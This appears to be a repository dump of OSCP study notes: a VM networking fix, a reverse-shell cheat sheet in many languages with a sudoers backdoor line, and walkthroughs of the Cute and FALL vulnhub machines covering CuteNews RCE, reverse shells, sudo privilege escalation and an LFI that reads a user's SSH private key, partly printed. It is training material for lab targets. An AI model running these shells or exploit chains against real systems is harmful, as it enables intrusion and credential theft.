   auto eth1
   iface eth1 inet dhcp
   auto ens33
   iface ens33 inet dhcp
   ```
   Then save and quit with `:wq`.

6. Finally run `exec /sbin/init`.
   ![Img](../FILES/GetTargetIP/img-20220723000852.png)
   - Some "Fail" messages appear here. Don't worry: they only mean that the extra interfaces I just added do not exist on this machine.
   ![Img](../FILES/GetTargetIP/img-20220723000932.png)

7. Scan again from Kali; barring surprises, the target's IP address now shows up.

--------------------------------------------------------------------------------
/Other Documents/OSCP-Exam-Report-Template.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/Other Documents/OSCP-Exam-Report-Template.docx

--------------------------------------------------------------------------------
/Other Documents/usually_command.md:
--------------------------------------------------------------------------------
# usu_command

## Full interactive shell (pty)
python -c "import pty;pty.spawn('/bin/bash')"

## Add a user to sudoers
echo "user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

## Reverse shell
[Generate Reverse Shell Query](https://sentrywhale.com/documentation/reverse-shell)

### Bash
```
bash -i >& /dev/tcp// 0>&1
0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196
sh -i >& /dev/udp// 0>&1
```

### Perl
```
perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
For windows only:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

### Python
```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Socat
```
socat tcp-connect:: exec:bash -li,pty,stderr,setsid,sigint,sane
```

### PowerShell
```
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

### PHP
```
php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");'
```

### Ruby
```
ruby -rsocket -e'f=TCPSocket.open("",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

### Netcat (nc)
```
nc -e /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f
rm -f x; mknod x p && nc 0<x | /bin/bash 1>x
```

### FreeBSD
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet > /tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |telnet > /tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc > /tmp/f
```

### Java
```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp//;cat <&5 | while read line; do \\$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# About
![Offensive](https://www.offensive-security.com/wp-content/uploads/2019/10/offsec-home-page.png)

Notes for preparing for the OSCP (Offensive Security Certified Professional).

# Platform

![VMware](https://img.shields.io/badge/VMware%20ESXI-7.0-orange)
![macOS](https://img.shields.io/badge/macOS-12.4-brightgreen)
![Kali](https://img.shields.io/badge/Kali%20Linux-2022.2-lightgrey)

# Notes directory
![Total](https://img.shields.io/badge/TargetNotes-19-blueviolet)

### 21.July-26.July
- Cute
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/Cute)
  - [EN](https://aaroncaiii.github.io/Target%20Notes-en/Cute)
  - [Download Cute](https://www.vulnhub.com/entry/bbs-cute-102,567/)
- Development
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/Development)
  - [EN](https://aaroncaiii.github.io/Target%20Notes-en/Development)
  - [Download Development](https://www.vulnhub.com/entry/digitalworldlocal-development,280/)
- FALL
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/FALL)
  - [EN](https://aaroncaiii.github.io/Target%20Notes-en/FALL)
  - [Download FALL](https://www.vulnhub.com/entry/digitalworldlocal-fall,726/)
- Joy
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/Joy)
  - [EN](https://aaroncaiii.github.io/Target%20Notes-en/Joy)
  - [Download Joy](https://www.vulnhub.com/entry/digitalworldlocal-joy,298/)
- SkyTower
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/SkyTower)
  - [Download SkyTower](https://www.vulnhub.com/entry/skytower-1,96/)
- lampiao
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/lampiao)
  - [EN](https://aaroncaiii.github.io/Target%20Notes-en/lampiao)
  - [Download lampiao](https://download.vulnhub.com/lampiao/Lampiao.zip)
- loly
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/loly)
  - [Download Loly](https://download.vulnhub.com/loly/Loly.ova)
- natraj
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/natraj)
  - [Download natraj](https://download.vulnhub.com/ha/Natraj.zip)
- sar
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/sar)
  - [Download sar](https://download.vulnhub.com/sar/sar.zip)
- solstice
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/solstice)
  - [Download solstice](https://download.vulnhub.com/sunset/solstice.ova)

### 28.July-2nd.August
- Decoy
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/decoy)
  - [EN](https://aaroncaiii.github.io/Target%20Notes-en/decoy)
  - [Download Decoy](https://download.vulnhub.com/sunset/decoy.ova)
- potato
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/potato)
  - [Download potato](https://download.vulnhub.com/potato/Potato.ova)
- Tre
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/Tre)
  - [Download Tre](https://download.vulnhub.com/tre/Tre.zip)
- oscp-voucher
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/oscp)
  - [Download oscp-voucher](https://download.vulnhub.com/infosecprep/oscp.zip)

### 4.August-9.August
- Seppuku
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/Seppuku)
  - [Download Seppuku](https://download.vulnhub.com/seppuku/Seppuku.zip)

### 11.August-16.August
- Inclusiveness
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/inclusiveness)
  - [Download](https://download.vulnhub.com/inclusiveness/Inclusiveness.ova)
- Geisha
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/Geisha)
  - [Download](https://download.vulnhub.com/geisha/Geisha.zip)
- Photographer
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/photographer)
  - [Download](https://download.vulnhub.com/photographer/Photographer.ova)
- wpwnvm
  - [Chinese](https://aaroncaiii.github.io/Target%20Notes/wpwnvm)
  - [Download](https://download.vulnhub.com/wpwn/wpwnvm.zip)

--------------------------------------------------------------------------------
/Target Notes-English Version/Cute.md:
--------------------------------------------------------------------------------
# Cute
## Information Gathering
### NMAP
#### Full Port Scan
```
└─$ sudo nmap -p- 192.168.146.75
[sudo] password for aaron:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT
Nmap scan report for 192.168.146.75
Host is up (0.00020s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
88/tcp  open  kerberos-sec
110/tcp open  pop3
995/tcp open  pop3s
MAC Address: 00:0C:29:1B:B0:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.06 seconds
```
#### Targeted Scan of the Open Ports
```
└─$ sudo nmap -p22,80,88,110,995 -sV -A 192.168.146.75
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT
Nmap scan report for 192.168.146.75
Host is up (0.00042s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) PIPELINING UIDL USER TOP LOGIN-DELAY(10) STLS
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) PIPELINING UTF8(USER) USER TOP LOGIN-DELAY(10) UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:1B:B0:20 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   0.42 ms  192.168.146.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.22 seconds
```
### Web Application Information Gathering
#### Nikto
```
└─$ nikto -h 192.168.146.75
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.75
+ Target Hostname:    192.168.146.75
+ Target Port:        80
+ Start Time:         2022-07-25 11:44:49 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CUTENEWS_SESSION created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.php, /index.html
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5af83f7e950ce, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-07-25 11:45:40 (GMT8) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
##### Found index.php
![Img](../FILES/Cute/img-20220725114624.png)
##### We can register a user
##### Open the registration page
![Img](../FILES/Cute/img-20220725114706.png)
##### But the verification code (CAPTCHA) does not load
##### Check the page source
![Img](../FILES/Cute/img-20220725114756.png)
##### Found captcha.php
![Img](../FILES/Cute/img-20220725114807.png)
##### Opening captcha.php directly shows the verification code
##### Logged in to the system successfully
![Img](../FILES/Cute/img-20220725114835.png)
##### Found CuteNews version 2.1.2
![Img](../FILES/Cute/img-20220725114909.png)
##### A Google search turns up an RCE vulnerability for this version
## Vulnerability Exploitation
```
└─$ searchsploit cutenews 2.1.2
---------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
---------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)                            | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                                | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                    | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                                                  | php/webapps/48800.py
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
##### The exploit is on Exploit-DB; download it with searchsploit
```
└─$ searchsploit -m php/webapps/48800.py
  Exploit: CuteNews 2.1.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48800
     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
File Type: Python script, ASCII text executable

Copied to: /home/aaron/Desktop/Cute-192.168.146.75/48800.py



┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75]
└─$ ls
48800.py  LANs.py
└─$ python3 48800.py



   _____      __      _   __                  ___   ___  ___
  / ___/_  __/ /____ / | / /__ _      _____  |_  | < / |_  |
 / /__/ // / __/ -_)/  |/ / -_) |/|/ (_-<  / __/_ / / / __/
 \___/\_,_/\__/\__//_/|_/\__/|__,__/___/ /____(_)_(_)____/
                   ___  _________
                  / _ \/ ___/ __/
                 / , _/ /__/ _/
                /_/|_|\___/___/




[->] Usage python3 expoit.py

Enter the URL> http://192.168.146.75/
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
168 | ================================================================ 169 | 170 | ============================= 171 | Registering a users 172 | ============================= 173 | 174 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 175 | └─$ 176 | 177 | ``` 178 | ##### But we can't execution this python file in this moment, view the python code 179 | ![Img](../FILES/Cute/img-20220725115151.png) 180 | ##### We didn't see the CuteNews Path when we visit website or jump to any other path, so remove that and try again 181 | ![Img](../FILES/Cute/img-20220725115318.png) 182 | ##### It's working 183 | ``` 184 | command > whoami 185 | www-data 186 | 187 | command > ls 188 | avatar_55Y2xTic4I_55Y2xTic4I.php 189 | avatar_ET3TpbEJQk_ET3TpbEJQk.php 190 | avatar_IgJLU8OSMX_IgJLU8OSMX.php 191 | avatar_PoKxESSE4D_PoKxESSE4D.php 192 | avatar_RvFcklLkzE_RvFcklLkzE.php 193 | avatar_VvgU5CZIce_VvgU5CZIce.php 194 | avatar_cruDW9A0zh_cruDW9A0zh.php 195 | avatar_rwRemM6TLd_message2.jpg 196 | index.html 197 | ``` 198 | ##### Process Reverse Shell 199 | ``` 200 | php -r '$sock=fsockopen("192.168.146.50",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 201 | ``` 202 | 203 | ![Img](../FILES/Cute/img-20220725115522.png) 204 | ##### Get the common shell 205 | ## Privilege Escalation 206 | #### Download linpeas from local and execPrivilege Escalationute 207 | ``` 208 | www-data@cute:/tmp$ wget http://192.168.146.50/linpeas.sh 209 | wget http://192.168.146.50/linpeas.sh 210 | --2022-07-23 14:30:48-- http://192.168.146.50/linpeas.sh 211 | Connecting to 192.168.146.50:80... connected. 212 | HTTP request sent, awaiting response... 
200 OK 213 | Length: 777005 (759K) [text/x-sh] 214 | Saving to: 'linpeas.sh' 215 | 216 | linpeas.sh 100%[===================>] 758.79K --.-KB/s in 0.02s 217 | 218 | 2022-07-23 14:30:48 (43.2 MB/s) - 'linpeas.sh' saved [777005/777005] 219 | 220 | ``` 221 | ##### Got the useful information from linpeas 222 | ``` 223 | ╔══════════╣ CVEs Check 224 | Vulnerable to CVE-2021-4034 225 | 226 | ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d 227 | ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid 228 | Matching Defaults entries for www-data on cute: 229 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 230 | 231 | User www-data may run the following commands on cute: 232 | (root) NOPASSWD: /usr/sbin/hping3 --icmp 233 | (ALL) NOPASSWD: ALL 234 | 235 | ``` 236 | ##### As you can see, we can use hping3 without password when we use sudo 237 | ``` 238 | www-data@cute:/tmp$ sudo /usr/sbin/hping3 239 | sudo /usr/sbin/hping3 240 | hping3> id 241 | id 242 | uid=0(root) gid=0(root) groups=0(root) 243 | hping3> whoami 244 | whoami 245 | root 246 | hping3> pwd 247 | pwd 248 | /tmp 249 | hping3> 250 | ``` 251 | ##### use netcat to reverse shell for local 252 | ``` 253 | hping3> nc -e /bin/sh 192.168.146.50 4445 254 | nc -e /bin/sh 192.168.146.50 4445 255 | ``` 256 | ##### Finally get root shell 257 | ``` 258 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 259 | └─$ nc -lvnp 4445 260 | listening on [any] 4445 ... 
261 | connect to [192.168.146.50] from (UNKNOWN) [192.168.146.75] 57576 262 | id 263 | uid=0(root) gid=0(root) groups=0(root) 264 | /usr/bin/script -qc /bin/bash /dev/null 265 | root@cute:/tmp# cd /root 266 | cd /root 267 | root@cute:~# ls 268 | ls 269 | localweb root.txt 270 | root@cute:~# cat root.txtg 271 | cat root.txtg 272 | cat: root.txtg: No such file or directory 273 | root@cute:~# cat root.txt 274 | cat root.txt 275 | 0b18032c2d06d9e738ede9bc24795ff2 276 | root@cute:~# ip a 277 | ip a 278 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 279 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 280 | inet 127.0.0.1/8 scope host lo 281 | valid_lft forever preferred_lft forever 282 | inet6 ::1/128 scope host 283 | valid_lft forever preferred_lft forever 284 | 2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 285 | link/ether 00:0c:29:1b:b0:20 brd ff:ff:ff:ff:ff:ff 286 | inet 192.168.146.75/24 brd 192.168.146.255 scope global dynamic ens33 287 | valid_lft 70362sec preferred_lft 70362sec 288 | inet6 fe80::20c:29ff:fe1b:b020/64 scope link 289 | valid_lft forever preferred_lft forever 290 | root@cute:~# whoami 291 | whoami 292 | root 293 | root@cute:~# 294 | ``` 295 | ![Img](../FILES/Cute/img-20220725120352.png) 296 | 297 | 298 | 299 | -------------------------------------------------------------------------------- /Target Notes-English Version/FALL.md: -------------------------------------------------------------------------------- 1 | # FALL 2 | ## Information Collect 3 | ### NMAP 4 | ``` 5 | └─$ sudo nmap -A -sV -T4 -p- 192.168.146.52 6 | Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-15 10:56 HKT 7 | Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan 8 | NSE Timing: About 99.58% done; ETC: 10:58 (0:00:00 remaining) 9 | Nmap scan report for 192.168.146.52 10 | Host is up (0.00021s latency). 
Not shown: 65522 filtered ports
PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey: 
|   2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
|   256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_  256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp    open   http        Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
111/tcp   closed rpcbind
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp   open   ssl/http    Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after:  2020-08-19T05:31:33
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open   netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp  open   mysql       MySQL (unauthorized)
8000/tcp  closed http-alt
8080/tcp  closed http-proxy
8443/tcp  closed https-alt
9090/tcp  open   http        Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://192.168.146.52:9090/
10080/tcp closed amanda
10443/tcp closed cirrossp
MAC Address: 00:0C:29:43:01:8A (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.4
Network Distance: 1 hop
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m30s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.8.10)
|   Computer name: fall
|   NetBIOS computer name: FALL\x00
|   Domain name: \x00
|   FQDN: fall
|_  System time: 2022-07-14T19:58:48-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-07-15T02:58:46
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.146.52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 174.40 seconds

```
The `http-generator` header identifies the site as CMS Made Simple, robots.txt disallows everything, SMB does not require message signing, port 9090 is a Cockpit console, and the TLS certificate has been expired since August 2020.
### DIRSEARCH
```
dirsearch -u https://192.168.146.52

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/aacai/.dirsearch/reports/192.168.146.52/_22-07-15_11-10-57.txt

Error Log: /home/aacai/.dirsearch/logs/errors-22-07-15_11-10-57.log

Target: https://192.168.146.52/

[11:10:57] Starting: 
[11:10:58] 403 -  220B  - /.fishsrv.pl
[11:10:58] 403 -  220B  - /.ht_wsr.txt
[11:10:58] 403 -  223B  - /.htaccess.bak1
[11:10:58] 403 -  223B  - /.htaccess.orig
[11:10:58] 403 -  225B  - /.htaccess.sample

....
```
The full report is long; save it to a text file and grep it for 200 responses:
```
└─$ cat 80_info.txt | grep "200"
[11:11:03] 200 -    4KB - /admin/login.php
[11:11:07] 200 -    2KB - /assets/
[11:11:09] 200 -    0B  - /config.php
[11:11:11] 200 -   24B  - /doc/
[11:11:12] 200 -   80B  - /error.html
[11:11:12] 200 -    1KB - /favicon.ico
[11:11:14] 200 -    8KB - /index.php
[11:11:15] 200 -   24B  - /lib/
[11:11:17] 200 -    3KB - /modules/
[11:11:19] 200 -   17B  - /phpinfo.php
[11:11:22] 200 -   79B  - /robots.txt
[11:11:26] 200 -   80B  - /test.php
[11:11:26] 200 -    1KB - /tmp/
[11:11:27] 200 -    0B  - /uploads/

┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ 
```
## Web Enumeration
dirsearch found the admin login page at /admin/login.php.
![Img](../FILES/FALL/img-20220715111910.png)

SQL injection against the login form fails.

The directories under /assets/ contain no files.

![Img](../FILES/FALL/img-20220715112000.png)

/doc/ returns nothing useful:
![Img](../FILES/FALL/img-20220715112225.png)

It contains only a single one-line comment, DUMMY HTML File (24 bytes; /lib/ has the same size, so it is most likely the same placeholder).

phpinfo.php also returns nothing of interest.

robots.php returns File not Found (nmap had already read /robots.txt, whose only entry disallows `/`).

Accessing test.php directly returns "Missing GET parameter", so the script expects a parameter whose name we have to guess.

![Img](../FILES/FALL/img-20220715112425.png)

Next, fuzz the parameter name with ffuf.

> ffuf (Fuzz Faster U Fool) is a fast web fuzzer. It is not installed on Kali by default; install it with `sudo apt install ffuf`.

The wordlist used here is not shipped by default either. Install it with `sudo apt install seclists`, or clone it from GitHub (https://github.com/danielmiessler/SecLists); the default path is /usr/share/seclists.

The `-fs 80` filter drops every response of exactly 80 bytes, which is the size of the "Missing GET parameter" page (dirsearch listed /test.php as 80B), so only parameter names the script actually handles are reported.

```
┌──(aacai㉿kali)-[/usr/share/wordlists/wfuzz]
└─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u "https://192.168.146.52/test.php?FUZZ=/etc/passwd" -fs 80

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://192.168.146.52/test.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 80
________________________________________________

file                    [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 11ms]
:: Progress: [4712/4712] :: Job [1/1] :: 3126 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

```
The accepted parameter is `file`, and the 1633-byte response is /etc/passwd, so test.php has a local file inclusion (at the very least an arbitrary file read).

```
https://192.168.146.52/test.php?file=/etc/passwd
```
![Img](../FILES/FALL/img-20220715115848.png)

The same request works over plain HTTP, which is simpler to script with curl:

```
http://192.168.146.52/test.php?file=/etc/passwd
```

Try root's SSH private key first:

```
┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ curl http://192.168.146.52/test.php?file=/root/.ssh/id_rsa
```

Nothing comes back (most likely the web server user cannot read /root), so look at the site itself for usernames:
![Img](../FILES/FALL/img-20220715120726.png)

A post is signed by qiu, so that account is the next candidate; /etc/passwd gives its home directory to try.

```
┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ curl http://192.168.146.52/test.php?file=/home/qiu/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0
FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX
61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien
qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d
Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS
vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO
NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge
d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW
iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka
U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl
KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G
